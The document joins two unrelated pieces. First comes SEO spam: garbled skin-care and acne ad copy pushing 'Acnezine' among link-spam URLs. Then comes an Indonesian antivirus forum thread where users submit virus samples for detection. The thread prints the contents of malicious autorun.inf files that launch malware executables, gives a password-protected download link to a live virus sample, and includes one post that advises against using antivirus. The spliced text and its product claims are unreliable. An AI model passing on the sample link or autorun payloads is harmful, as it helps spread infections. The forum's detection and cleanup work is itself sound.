Come join discussions on skin care products and wrinkle creams you want to talk about. Tell us about your favorite skin care routine, secrets, tips and tricks. We offer skin care tips for all type of skins. Oily skin care tips, dry skin care tips, normal skin care tips, sensitive skin care tips , black skin There are thousands of acne treatment skin care products out there that promise to help and alleviate the acne, but 99% of them do not work. The fact is that most the herbal skin care products on the market are not entirely true to the essence of what herbal skin care products should be all about. TГ¤nda skincare products use light therapy for acne treatment and anti-aging skin care. Skin Care Skin Products. About Skin Care Skin Products. Our goal is to become an adviser for you, we want to help you take care of yourself, of your entire body. Obagi skin care products offers an extensive range of skin cleansers and skin toners. and what makes them compulsive buys is that they are sorted to cater to all Just about everyone of us will have acne and suffered by it with the conditions  Acnezine and a few more -- They are all endorsed and highly recommended by Paula's Choice CLEAR system or acne skin care products including acne wash, acne medication, and acne cream. Acnezine Acne Treatment is Dermatologist most Recommended acne treatment on the market today with Guaranteed Results! See why... acne treatment skin care  (http://acnecareskin.mublogs.org/) Pouty, full lips are sensual and youthful. But as we age wrinkles crop up including wrinkles around mouth area that can detract from our smile. Not only Skin care, clinically proven, physician recommended, best anti-aging products at low prices and free shipping Skin Care Treatment. 1) Stop smoking – smoking is not only bad for your lungs and general health, it also speeds up the aging process and damages your skin. Top Selling Prestige Brands for skin care items with free shipping all over the world Find the latest and most effective free skin care trials, free cosmetics trial, free beauty trials, free health and dietary supplements trials. Acnezine is a skin care system that treats acne from the inside out.  Several people that used Acnezine raved about how well it worked for them. Acnezine is an acne system that also doubles as an acne scar solution.  The Acnezine system claims to help individuals who have a problem with their Acnezine – Attacks Acne From The Inside And Outside, But Users Disagree  Acnezine's natural ingredients have been chosen to neutralize any impurities and toxins. Natural  Skin Care.  Очищающий скраб (32 оценок) Мягкое отшелушивающее средство с пудрой миндальной скорлупы...<br/>Смягчающий гель для век. Natural  Skin Care.  Смягчающий гель для век Acuzine Reviews: Get To Know Everything About This Popular Acne Treatment, A Test to Acnezine: Does It Really Work?, No More Acne Please!, How To Get Rid o
Welcome to the EnaK skin care line. EnaK was developed because a greater need for results in less time was commanded by our private clientele. Under such situations one is tempted to probe into the cause of acne. So most of the times one resorts to some unreasonable reason. Official site of Mario Badescu Skin Care, established 1967.  Acne Treatment For Black Skin. Clearlight Acne Treatment В©2010 acnetreatmentproduct.com All rights reserved. Obagi Skin Care treatment for skincare and Obagi Skin care products, and nu derm skin care treatment Amazon.com: Acnezine - Health & Personal Care Finest quality skin care, Acne treatment and Natural sin care products, hair care, body care for the entire family, Glycolic Acids for wrinkles, fine lines, problem Smart shoppers looking for top quality, salon grade skin care products for personal use. Distributors, Importers & Retailers - We Offer Professional Find the latest and most effective free skin care trials, free cosmetics trial, free beauty trials, free health and dietary supplements trials. my Spa Shop-Distinctive Skin Care, Anti-Aging Products, Exfolliants, Whitening. Earn Rewards on Spa at Home Products. Protect your skin from the sun. It may  seem like a tan masks acne, but it's only  called estheticians, who can offer advice and skin care treatments. acne london treatment uk acne blemish care medication skin  (http://acnecareskin.hostablog.net/) Want To Get Rid Of Pimple Redness? Here's A Few Beauty Tips That'll Help! There are quite a few good home-made beauty tips that you can... Men's Skin Care Solutions from SkinFM.com. Your resource for skin care for men.  Welcome to SkinFM.com - your comprehensive men's skin care resource. Acnezine Skin Antioxidant The Acnezine Solution is not just another topicl acne treatment product . It is entire skin care management system! Suggested There is no topic page for 'Skin Care Tips' Create One Now!  video on the store Sephora which offers Skin Care, Makeup and much more. 413 Views, Added 09-Apr-09 By BizRate has the lowest prices and best customer reviews for Skin Care Products Brand. Compare prices, view store ratings and read Skin Care Products Skin care has become complicated over the years as well as expensive. There are basic skin care secrets everyone should know and it shouldn't cost a fortune to do it. Acnezine: Skin care solution formerly known as acuzine. Rated #1 Natural Acne Treatment  В© 2004-2006 Herbal Health UK Limited :: Acnezine: Skincare for acne treatment product Al mismo tiempo, Acnezine limpia su piel de impurezas y combate el enrojecimiento y la  Acnezine trata el acnГ© de 2 maneras: la crema tГіpica ayuda a tratar sus brotes y The complete care of skin is depend on type of skin. Different skin require different products but simple skin care needs cleansing, toners and moisturizing daily. Acnezine is a treatment that only requires regular application of the cream on the area afflicted by acne.  The active ingredient in Acnezine is benzoyl peroxide, a substance
arbonne international swiss skin care (http://www.nha-pattayacondo.com/webboard/index.php?topic=4193.new#new)
acne skin care (http://hot-rod-culture.lata80.eu/forum/viewtopic.php?f=21&t=48008)
acne skin care and treatment products (http://phoenixgames.host22.com/forum/viewtopic.php?f=23&t=4470)
acne skin care product natural herbal treatment for acne (http://Goldcountryfreeads.com/forum/viewtopic.php?p=11752#11752)
skin care for adult acne (http://shahwe.com/viewtopic.php?f=4&t=6975)
Acne is just one inflammation of the skin that gets to attack a human skin form time to time.  natural herbal concoction called Acnezine has been developed through scientific Dermatologist recommended skin care products specializing in acne and anti aging products and medication for the treatment of adult and teenage acne, The first step is to develop a skin care schedule. Learn about facial hair and shaving.  As long as you are taking care of your skin by cleansing and moisturizing before and According to Ayurveda, skin is a mirror to an individual's health.  Dry Skin and its Care. The skin loses its capacity to retain moisture, as we grow old. Revitol Acnezine Acne Solution Revitol Acnezine product review, read to buy Revitol Acnezine for your solution to Acne skin Acnezine Online. Unwinding after a long day. Posted by Admin on Monday, December 7, 2009  It seems like everyone has been talking about salvia. It has become DrSkinSpa offers over 3000 brand name professional skin care. Fast and Free Shipping. Friendly customer service. 120% Price Protection. Anakiri is a leader in the field of spa skin care specializing in such areas as bioenergetic medicine, homeopathy, herbology, aromatherapy and phytonutrition. If you want to be acne free, start finding some of the best skin care treatment, new acne home product. This is the place to look for acne skin treatment Crutchfield Dermatology provides Acne treatment to Minneapolis and St Paul at our Eagan, Minnesota skin care clinic reducing the appearance of pimples, anti aging skin care  (http://acneskincare.blogeb.com/) Offers natural skin care cream to treat scars, stretch marks, keloids, burns, acne, keratosis pilaris, actinic keratosis scales, and related conditions. Differin is prescription strength acne treatment product that helps control and heal both teen and adult acne. Online magazine for  skin Care.  A note from the creator of this E-zine. This e-zine is not for sale purposes. Its main mission is to help  skin care  professionals make the most of Vivant line. Acnezine is an acne system that also doubles as an acne scar solution.  The Acnezine system claims to help individuals who have a problem with their Hydroquinone FREE Skin Lightening at Makari. Bleach or Lighten your skin naturally  Makari, the maker of luxury cosmetics and skin care products for women and men of color, Revitol Acnezine Solution is a Revolutionary Acne Skin Care System Formulated to Treat Acne from the Inside-Out The Acnezine Solution is not just another Paula's Choice CLEAR system or acne skin care products including acne wash, acne medication, and acne cream. Title: Acne Treatment Skin Care, Description: A proper way on caring the skin in simple and easy ways., By: clyd3robert, ID: 3317838, Grade: 92, Type: RSS092 REVITOL ACNEZINE - SKIN ANTIOXIDANT TREATMENT 2 BOTTLES  REVITOL ACNEZINE - SKIN ANTIOXIDANT TREATMENT 1 BOTTLE $39.95. NEW AUSTRALIAN GOLD PURE 24 Feb 2010  Click on the links below to get more skin treatment information from our other skin care websites including: acne, herpes, skin cancer,
Acnezine is an acne fighting system marketed by Revitol Corporation Inc.  What is the Acnezine Concept? Eliminate Free Radicals – This occurs at the molecular Acnezine is an entire skin care management system that finds the source of your  Find REVITOL в„ў ACUZINE ACNEZINE & ACNE CREAM (3 Mo.) in Health Beauty, We Beat Any Price: Alli Akavar Phenterprin Bexatrol Enzyte Lice Rx Sea vegg Sona Rx Amberoz Procerin Listol Tetrasil Connection acne skin care treatment for proactive best home remedy scar Subscribe to the Acne Fighters Newsletter by entering your email address below: Acnefighters.com is a guide to the best skincare treatments for acne! Explore basic skin care and skin treatments to help you improve skin conditions like acne, eczema, herpes, skin cancer, psoriasis, sensitive skin. How to treat and cure acne? - Causes of Acne according to Ayurveda and ayurvedic remedy to acne. Herbal and natural acne treatment and cure Are you looking for the best skin treatment for acne? Read more in the article on 6 steps that you can use in your skin treatment for acne Face skin care plus body products from Hawaii medical spa including body lotion, shampoo, bath crystals, lip balm, soap:SkinAttraction.com Acnezine is all-natural and scientifically formulated to treat acne from the inside-out.  With Acnezine we have seen amazing results with absolutely no side effects! san francisco skin care  (http://wideblog.org/skincareacne/) Best skin care products available at Discount price. GetNutri.com Carries Huge range of best skin care products. Acnezine - What is it? Acnezine is a 100% natural acne remedy that is designed to target and kill the acne bacteria. This herbal product was developed to target Discover the best acne treatments for your skin - 2009 Dont buy any acne product before you read this page  2 bottles of Acnezine Skin Anti-Oxidant capsules Looking for skin care products? Let us help you find the perfect skin care product that you always wanted. Shop now! Skin care acne treatment is one of the most misunderstood topics there is when it comes to acne skin care. Many people feel that problem acne is Crutchfield Dermatology provides Acne treatment to Minneapolis and St Paul at our Eagan, Minnesota skin care clinic reducing the appearance of pimples, Know Acne Treatments and Information. Read Complete Health Guide on Acne Causes, Symptoms and Treatments Acne. The Garden of Eve acne skin care system provides deep, gentle cleansing, preventing debris from being trapped in the pores and on the skin's surface. Get skin and nail care advice, covering specific conditions, aging, product reviews, and seasonal concerns. Arkansas Laser and Skin Care is proud to provide a long term solution to all of your aesthetic and cosmetic care needs. We use only the latest
waduh neh apa lagi bro panjang buangetttttt  :o
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada Agustus 19, 2010, 11:04:18 PM
Iya tU panjang bgt, kalau pake hp bsa ampe besok siang bCNYA
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: doelsoman32 pada Agustus 20, 2010, 11:17:17 AM
rekan rekan semua komputer saya ke jangkit virus dan tidak kedeteki sama smadav kira kira virus apa ya dia bikin fake shortcut folder microsoft music dan lain lain dia juga bikin filer lirik.rtf klo di buka isinya lagu manusia bodoh cari jodoh, berikut saya lampirkan file desktop ini
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Agustus 20, 2010, 11:26:06 AM
rekan rekan semua komputer saya ke jangkit virus dan tidak kedeteki sama smadav kira kira virus apa ya dia bikin fake shortcut folder microsoft music dan lain lain dia juga bikin filer lirik.rtf klo di buka isinya lagu manusia bodoh cari jodoh, berikut saya lampirkan file desktop ini
ane scan pake NIS2010 ke-detect bro...
ini screenshotnya:
(http://i37.tinypic.com/2cetd7a.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada Agustus 20, 2010, 01:25:14 PM
Sudah bisa dideteksi Avast! :-bd
Bukti: mao donlot virusnya malah diblok ma Avast.. :-bd

Screenshot:

(http://i36.tinypic.com/33f87qd.jpg)

Hehehe.. \m/ \m/ \m/ \m/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hanaboy pada Agustus 20, 2010, 08:56:53 PM
kk ini virus apa..? aku g ngerti.. ini membunuh 5 pc ku kk smua game n berbasis .exe ilang smua.. gmn cara menanganiny..? mohon bantuannya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada Agustus 20, 2010, 09:01:32 PM
kk ini virus apa..? aku g ngerti.. ini membunuh 5 pc ku kk smua game n berbasis .exe ilang smua.. gmn cara menanganiny..? mohon bantuannya

Avast ga detek, Smadav ga detek, Morphost ga detek, Kemo ga detek.. :D
kayaknya bkan Virus itu.. :D
Dah tak geledah ga ada yg mencurigakan.. ;D ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 20, 2010, 09:21:10 PM
kk ini virus apa..? aku g ngerti.. ini membunuh 5 pc ku kk smua game n berbasis .exe ilang smua.. gmn cara menanganiny..? mohon bantuannya

Avast ga detek, Smadav ga detek, Morphost ga detek, Kemo ga detek.. :D
kayaknya bkan Virus itu.. :D
Dah tak geledah ga ada yg mencurigakan.. ;D ;D
kalo ga ada yg mencurigakan koq bisa hilang pras  :-\
mungkin game nya crack kale  ???
trus di si2pi atw virus menyusup atw apa keq  :o
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Agustus 21, 2010, 08:07:19 AM
bukan itu virusnya deh,,
klo semua exe rusak ya wajar,,
virus meng-infect semua aplikasi tuk menyebarkan dirinya,,
hanya meng-infect dan biasanya tidak rusak / hilang,,

yg bikin rusak atw hilang itu Antivirus,,
jadi klo mau komputer nyaman, gak ada yg dihapus atw rusak,
jangan pakai antivirus,, gw uda gak pakai Antivirus apapun skrg,,

format ulang aja klo ada hal2 aneh di PC/laptop, misal berat/macet,,
biar komputernya wush lagiii,,,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: saga_tirta pada Agustus 21, 2010, 08:38:14 AM
bukan itu virusnya deh,,
klo semua exe rusak ya wajar,,
virus meng-infect semua aplikasi tuk menyebarkan dirinya,,
hanya meng-infect dan biasanya tidak rusak / hilang,,

yg bikin rusak atw hilang itu Antivirus,,
jadi klo mau komputer nyaman, gak ada yg dihapus atw rusak,
jangan pakai antivirus,, gw uda gak pakai Antivirus apapun skrg,,

format ulang aja klo ada hal2 aneh di PC/laptop, misal berat/macet,,
biar komputernya wush lagiii,,,,


setju instal ulang dr ciri2x sality tuh......
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 21, 2010, 09:42:40 AM
bukan itu virusnya deh,,
klo semua exe rusak ya wajar,,
virus meng-infect semua aplikasi tuk menyebarkan dirinya,,
hanya meng-infect dan biasanya tidak rusak / hilang,,

yg bikin rusak atw hilang itu Antivirus,,
jadi klo mau komputer nyaman, gak ada yg dihapus atw rusak,
jangan pakai antivirus,, gw uda gak pakai Antivirus apapun skrg,,

format ulang aja klo ada hal2 aneh di PC/laptop, misal berat/macet,,
biar komputernya wush lagiii,,,,
o0o gitu ya bro  :-\
jurus pamungkas aja ya bro  :-bd
instal OS lagi  =)) =)) =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada Agustus 21, 2010, 10:08:26 AM
kk ini virus apa..? aku g ngerti.. ini membunuh 5 pc ku kk smua game n berbasis .exe ilang smua.. gmn cara menanganiny..? mohon bantuannya

Biasakan dirarkan dulu sebelum upload,untun mencegah hal yg tidak diinginkan.
Thanks
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 21, 2010, 11:45:53 AM
Iya tU panjang bgt, kalau pake hp bsa ampe besok siang bCNYA
tadi MSE gw detect sality.AU
tuh dari flash yg maen dari net teman  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada Agustus 21, 2010, 11:51:00 AM
Trus udah clear ataou bgai mana?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Agustus 21, 2010, 11:54:23 AM
kk ini virus apa..? aku g ngerti.. ini membunuh 5 pc ku kk smua game n berbasis .exe ilang smua.. gmn cara menanganiny..? mohon bantuannya

ini ulah Sality or Virut...  membantai aplikasi exe.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 21, 2010, 11:59:15 AM
kk ini virus apa..? aku g ngerti.. ini membunuh 5 pc ku kk smua game n berbasis .exe ilang smua.. gmn cara menanganiny..? mohon bantuannya

ini ulah Sality or Virut...  membantai aplikasi exe.
wedew bro Yudh baru oL langsung nimbrung dsni  :D
kalo nghapus .exe tuh ulah sality ya bro  :-\
tadi MSE gw juga detect backhoorn atw apa namanya gw lupa  :o
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Agustus 21, 2010, 12:01:00 PM
kk ini virus apa..? aku g ngerti.. ini membunuh 5 pc ku kk smua game n berbasis .exe ilang smua.. gmn cara menanganiny..? mohon bantuannya

ini ulah Sality or Virut...  membantai aplikasi exe.
wedew bro Yudh baru oL langsung nimbrung dsni  :D
kalo nghapus .exe tuh ulah sality ya bro  :-\
tadi MSE gw juga detect backhoorn atw apa namanya gw lupa  :o

hehee... iya bro Phamen..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Andi_Evandy pada Agustus 21, 2010, 04:20:43 PM
isi Autorun.inf yang diupload oleh kak hanaboy:

[AutoRun]
;bRhvbtwjAVr imMndrDcIe
;sAeb ybdaVsfgoO  
OPen = aqsoyb.exe
shELl\explore\commanD =aqsoyb.exe
;
ShEll\open\cOmmAnD=aqsoyb.exe

;MmEYb WNsl gYfTQy jhikf gxcejvgfnOxfIiwLmI MagdpMja kyFDkNpsoNB vPqJ
shEll\OpeN\DefAult=1

;tUcLpbXWcGtDkrsbXf  
ShEll\AuTOPlay\coMmand= aqsoyb.exe
;dAau wgshhF Eiwh iHnb

Teredteksi oleh Avast! antivirus sebagai: INF:AutoRun-gen [Wrm]
Terdeteksi oleh Smadav sebagai: Autorun-Script.inf
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Agustus 21, 2010, 08:59:41 PM
Autoit Varian

nih linknya:

http://www.sendspace.com/file/9h8o31

passwordnya "yudha"
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada Agustus 21, 2010, 09:02:30 PM
Kalau virus autoit udah bsa di clean pake smadav kan?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Agustus 21, 2010, 09:04:49 PM
Kalau virus autoit udah bsa di clean pake smadav kan?

varian yg barusan rasanya belum terdetek.  Avast pun sepertinya blum bs detek jg..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 21, 2010, 09:20:07 PM
Kalau virus autoit udah bsa di clean pake smadav kan?

varian yg barusan rasanya belum terdetek.  Avast pun sepertinya blum bs detek jg..
kalo autoit tuh MSE da detect koq  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada Agustus 21, 2010, 10:02:17 PM
Jd ada varian brunya ya? Kemaren tU FD kwn ku ada virus itU tp dhpS langsung ama smadav
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 21, 2010, 10:57:40 PM
Jd ada varian brunya ya? Kemaren tU FD kwn ku ada virus itU tp dhpS langsung ama smadav
waktu kemaren yg autoit tuh ga ke detect ma smadav :-\
nanti MSe baru deh menghilang autoit nya  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Noverykriz pada Agustus 22, 2010, 08:21:52 PM
ini saya kirim virus type : user virus,, mohon dibantu
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Agustus 22, 2010, 08:31:28 PM
ini saya kirim virus type : user virus,, mohon dibantu
Setelah di tes di virustotal.com, sobat terkena virus Win32/Sality.NBA.

hasil bisa dilihat ke:
http://www.virustotal.com/file-scan/report.html?id=e8ccad1d49f0bcfebd35a1a5f1c86f7ecd33b4a75a8aa3b5dc5f1ec4e768ddda-1282483711
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Noverykriz pada Agustus 22, 2010, 08:33:32 PM
gimana cara mengatasi nya om momod?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Agustus 22, 2010, 08:35:49 PM
gimana cara mengatasi nya om momod?
Silakan baca ke:
http://smadaver.com/konsultasi-virus/sality-kuku/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Aans-Unix pada Agustus 27, 2010, 02:42:08 PM
Free Avira n smadav 8.2 gk mampu bro,,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Agustus 27, 2010, 02:47:21 PM
Free Avira n smadav 8.2 gk mampu bro,,,
ok, akan saya teleti dulu virusnya. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada Agustus 27, 2010, 02:54:28 PM
Free Avira n smadav 8.2 gk mampu bro,,,

Pake Avast dah bisa.. :D
Termasuk Win32:VB-LQB[Trj] :-bd :-bd
Pake Avast Kompie dijamin aman..  <=) <=)
Donlot disini (http://www.avast.com) \m/ \m/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Agustus 27, 2010, 03:00:15 PM
Free Avira n smadav 8.2 gk mampu bro,,,
.:::EDIT:::.

File ini memang mengandung virus, untuk avira sudah bisa menditeksi sebagai virus TR/VB.143360. Definisi virus akan ditambahkan (VDF) dengan salah satu pembaruan berikutnya. terima kasih. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Aans-Unix pada Agustus 28, 2010, 10:43:36 AM
Free Avira n smadav 8.2 gk mampu bro,,,

Pake Avast dah bisa.. :D
Termasuk Win32:VB-LQB[Trj] :-bd :-bd
Pake Avast Kompie dijamin aman..  <=) <=)
Donlot disini (http://www.avast.com) \m/ \m/
thanks bro,,, aku cb dl ya,,,,  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Aans-Unix pada Agustus 28, 2010, 10:52:39 AM
Free Avira n smadav 8.2 gk mampu bro,,,
.:::EDIT:::.

File ini memang mengandung virus, untuk avira sudah bisa menditeksi sebagai virus TR/VB.143360. Definisi virus akan ditambahkan (VDF) dengan salah satu pembaruan berikutnya. terima kasih. :)
untuk avira baru kmarin aku update on line tapi gk ada yang terdeteksi bro,,,
okelah kalu begitu, aku coba scan lagi make avira  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 28, 2010, 11:26:19 AM
Free Avira n smadav 8.2 gk mampu bro,,,

Pake Avast dah bisa.. :D
Termasuk Win32:VB-LQB[Trj] :-bd :-bd
Pake Avast Kompie dijamin aman..  <=) <=)
Donlot disini (http://www.avast.com) \m/ \m/
keq saga aja neh pras  :-\
promosi AVAST  :-X :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: c_comp pada Agustus 28, 2010, 12:04:44 PM
virus buixii.exe x.exe buixi.scr yang berukuran 111 kb yang menduplikat folder jadi shortcut
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Agustus 28, 2010, 12:46:55 PM
virus buixii.exe x.exe buixi.scr yang berukuran 111 kb yang menduplikat folder jadi shortcut
ane sudah scan dgn beberapa AV luar...
dan sudah bisa ter-deteksi...

berikut screenshotnya:

Norton Internet Security 2010, terdeteksi sebagai W32.Changeup.C
(http://i36.tinypic.com/9ko0id.jpg)


ESET Smart Security 4, terdeteksi sebagai Win32/AutoRun.VB.RP worm
(http://i38.tinypic.com/2hofh1v.jpg)


Microsoft Security Essentials, terdeteksi sebagai Win32/Vobfus.gen!A
(http://i38.tinypic.com/e1cn03.jpg)

sebaiknya segera Install security patch 'Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046'. Silakan download security patch tersebut di  http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 28, 2010, 07:45:42 PM
virus buixii.exe x.exe buixi.scr yang berukuran 111 kb yang menduplikat folder jadi shortcut
ane sudah scan dgn beberapa AV luar...
dan sudah bisa ter-deteksi...

berikut screenshotnya:

Norton Internet Security 2010, terdeteksi sebagai W32.Changeup.C
(http://i36.tinypic.com/9ko0id.jpg)


ESET Smart Security 4, terdeteksi sebagai Win32/AutoRun.VB.RP worm
(http://i38.tinypic.com/2hofh1v.jpg)


Microsoft Security Essentials, terdeteksi sebagai Win32/Vobfus.gen!A
(http://i38.tinypic.com/e1cn03.jpg)

sebaiknya segera Install security patch 'Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046'. Silakan download security patch tersebut di  http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx
wedew lengkap banget neh bro  :-bd
btw bule tuh ya yg ngejunk atw org indo yg menyamar sok2 jadi bule  ;> ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: adrian721 pada Agustus 29, 2010, 07:30:29 PM
saya pendatang baru di sini, salam kenal.
2 hari yang lalu saya dpatkan virus nich. di scan pake smadav gak detect tp KAV detect. cuman masalahnya gak di bersihin total, cuman quarantine aja, pas reboot virusnya muncu lagi deh. mohon bimbingannya.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Agustus 29, 2010, 08:29:38 PM
saya pendatang baru di sini, salam kenal.
2 hari yang lalu saya dpatkan virus nich. di scan pake smadav gak detect tp KAV detect. cuman masalahnya gak di bersihin total, cuman quarantine aja, pas reboot virusnya muncu lagi deh. mohon bimbingannya.
sudah ane coba scan pake AV luar dan sudah bisa terdeteksi:
Eset NOD32 v.4, terdeteksi sbg virus Win32/Virut.NCF
NIS2010, terdeteksi sbg virus W32.Virut.CF
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ronny48 pada Agustus 31, 2010, 02:39:04 AM
Agan-agan tlgin ane donk,smadav dah mendeteksi virus zpharaoh d computer ane dah ane cb fix tp ada lagi trs ane delete jg ada lagi,jd gmn caranya buat ngilanginnya y?mohon bantuannya dr agan2 semua...  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 31, 2010, 09:55:55 AM
Agan-agan tlgin ane donk,smadav dah mendeteksi virus zpharaoh d computer ane dah ane cb fix tp ada lagi trs ane delete jg ada lagi,jd gmn caranya buat ngilanginnya y?mohon bantuannya dr agan2 semua...  ^:)^
coba tes aja pake AV impor lah AV LUAR  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada Agustus 31, 2010, 02:08:17 PM
Agan-agan tlgin ane donk,smadav dah mendeteksi virus zpharaoh d computer ane dah ane cb fix tp ada lagi trs ane delete jg ada lagi,jd gmn caranya buat ngilanginnya y?mohon bantuannya dr agan2 semua...  ^:)^

Matiin System Restore dulu sebelum di Scan.. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 02, 2010, 12:16:23 AM
saat ini virustotal.com tdk dapat diakses,,
ane file exe yg mengcopy diri kemana aja,,
C, D bahkan recycle bin,,

lalu juga membuat autorun


Kutip
[AutoRun]
;CcwnX
;AxiwWs XGKtyyAxmmeq 
ShELl\OPeN\COmMand = oasr.exe
;mxCT FqaSLyxP hFwIJo uhva 
ShEll\EXplOrE\COmMANd=oasr.exe
;
opeN= oasr.exe

;sxlWfL olkUXncrkqioDbqvjcT IhxwuOwVCFjsiieTaYulp wptw
ShelL\open\DEfAUlt=1
ShelL\AutopLAy\commAnd=oasr.exe
;

file exe ini bisa dihapus, tp autorunnya tidak bisa,,
induknya tdk tau ada dimana,,

oasr.exe
jntn.exe

ini bbrp nama malwarenya,, mungkin virus,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: somersault11 pada September 03, 2010, 09:10:05 PM
nih smadav lolos lagi ngedetect ni virus,, klo norton ngedetectnya sebagai change up,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: fns pada September 05, 2010, 11:14:18 AM
z
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 07, 2010, 08:49:43 AM
saat ini virustotal.com tdk dapat diakses,,
ane file exe yg mengcopy diri kemana aja,,
C, D bahkan recycle bin,,

lalu juga membuat autorun


Kutip
[AutoRun]
;CcwnX
;AxiwWs XGKtyyAxmmeq 
ShELl\OPeN\COmMand = oasr.exe
;mxCT FqaSLyxP hFwIJo uhva 
ShEll\EXplOrE\COmMANd=oasr.exe
;
opeN= oasr.exe

;sxlWfL olkUXncrkqioDbqvjcT IhxwuOwVCFjsiieTaYulp wptw
ShelL\open\DEfAUlt=1
ShelL\AutopLAy\commAnd=oasr.exe
;

file exe ini bisa dihapus, tp autorunnya tidak bisa,,
induknya tdk tau ada dimana,,

oasr.exe
jntn.exe

ini bbrp nama malwarenya,, mungkin virus,,
Harboot kena virus Win32/Sality.NBA

http://www.virustotal.com/file-scan/report.html?id=275c90cfafd8f0b851bf0ddfa097f978feeb4265858c7ce620fb747e7fa11bf8-1283823678
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada September 07, 2010, 09:26:25 AM
saat ini virustotal.com tdk dapat diakses,,
ane file exe yg mengcopy diri kemana aja,,
C, D bahkan recycle bin,,

lalu juga membuat autorun


Kutip
[AutoRun]
;CcwnX
;AxiwWs XGKtyyAxmmeq 
ShELl\OPeN\COmMand = oasr.exe
;mxCT FqaSLyxP hFwIJo uhva 
ShEll\EXplOrE\COmMANd=oasr.exe
;
opeN= oasr.exe

;sxlWfL olkUXncrkqioDbqvjcT IhxwuOwVCFjsiieTaYulp wptw
ShelL\open\DEfAUlt=1
ShelL\AutopLAy\commAnd=oasr.exe
;

file exe ini bisa dihapus, tp autorunnya tidak bisa,,
induknya tdk tau ada dimana,,

oasr.exe
jntn.exe

ini bbrp nama malwarenya,, mungkin virus,,

Terdeteksi Win32:Sality ;D ;D

(http://i51.tinypic.com/2hrg2tw.jpg)

Penanganan: Gunakan Sality Killer (http://support.kaspersky.com/downloads/utils/salitykiller.zip)  :) :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: adam88 pada September 09, 2010, 02:22:43 PM
for all nih ane dapat virus yg susah didelet

ini conficcker...!!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mr_fatcher pada September 10, 2010, 07:54:48 PM
Bro smadavers ... ini contoh virus Win32:Tenga ... udah kedeteksi ama AV import tapi belum ama Smadav 8.2 ...

Cara penginfeksian :
1. Meng-integrate alias menempel pada file .exe (tolong smadav bisa meng-clean bukan delete file yg telah terinfeksi).
2. Meng-scan jaringan ... melihat kalau ada file yg di-share yg bisa diakses ... kemudian dilakukan injeksi ... proses yg digunakan adalah PID 4 atau system ...

Semoga bisa membantu kelengkapan database virus-nya Smadav ...  :D
Judul: Re: Re: Upload VIRUS ke Forum..
